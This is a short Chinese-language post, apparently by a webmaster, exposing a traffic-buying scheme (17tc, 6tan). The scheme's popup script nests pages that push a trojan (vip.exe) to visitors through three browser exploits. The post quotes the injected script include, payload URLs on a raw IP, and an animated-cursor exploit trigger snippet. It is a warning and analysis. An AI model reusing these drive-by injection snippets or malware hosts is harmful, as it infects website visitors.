17tc最近收购流量,10000IP是150块,价格高,而且是日付款。
不过我却发现它们不止收购点流量那么简单。
我们任意打开一个放置了17tc的网站,分析下他的主要代码:
<script src=http://www.17tc.com/pop.js></script>
打开这个js发现里面有这样一段代码:
里面嵌套了这个页面:
http://58.221.28.40/www/web.htm
打开一看404错误:
呵呵,难道他辛辛苦苦就为了嵌套个不存在的页面吗?
我们看看这个页面的源代码吧:
呵呵,这样伪装的由嵌套了3个页面,不用想了,肯定是挂马了
我们打开vip1.htm,发现:
原来是要下载这个木马啊:
http://58.221.28.40/www/vip.exe
打开vip2.htm,发现下面的代码:
<DIV style="CURSOR: url(ah.c)"></DIV>
<script type="text/jscript">function init() { document.write("");}
window.onload = init;</script>
利用了微软鼠标漏洞挂马哦,分析了一下
http://58.221.28.40/www/ah.c发现还是挂的这个
http://58.221.28.40/www/vip.exe木马
再打开vip.htm,我们发现下面的代码:
<SCRIPT src="vip.js"></SCRIPT>
<BODY onload=shit();><BR><BR>
打开vip.js看看吧:
还是木马啊,这个17tc很绝啊,用了3种不同的漏洞挂马,厉害!
大家可以想下,弹出10000IP考虑下广告过滤的原因,你基本上要有30000Ip的流
量吧,你给30000人挂了马,并且弹出了此网站的10000IP,收入150块。
站长们醒醒吧,别为了点蝇头小利把自己人格都出卖了,大家都不傻,再说一句
挂马可是触犯了国家法律的!
附上此人的2个挂马联盟:
www.17tc.com
www.6tan.com
